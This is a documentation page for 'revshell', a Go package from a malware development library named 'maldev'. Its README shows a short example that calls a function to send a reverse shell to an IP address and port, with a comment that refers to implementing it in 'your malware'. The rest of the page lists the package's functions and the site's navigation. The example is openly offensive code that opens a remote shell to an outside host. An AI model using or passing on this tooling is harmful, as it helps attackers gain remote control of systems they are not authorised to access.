revshell

package
v0.1.0 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Jan 13, 2023 License: MIT Imports: 8 Imported by: 0

README

Reverse Shell Examples

  • Send reverse shell to given ip and port
package main

import (
  "github.com/D3Ext/maldev/revshell"
)

func main(){
  // Not recommended to implement in your malware
  revshell.Reverse("192.168.1.37", "9001")
}

Documentation

Index

Constants

This section is empty.

Variables

This section is empty.

Functions

func BashFormat

func BashFormat() string

func Reverse

func Reverse(ip string, port string)

Types

This section is empty.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL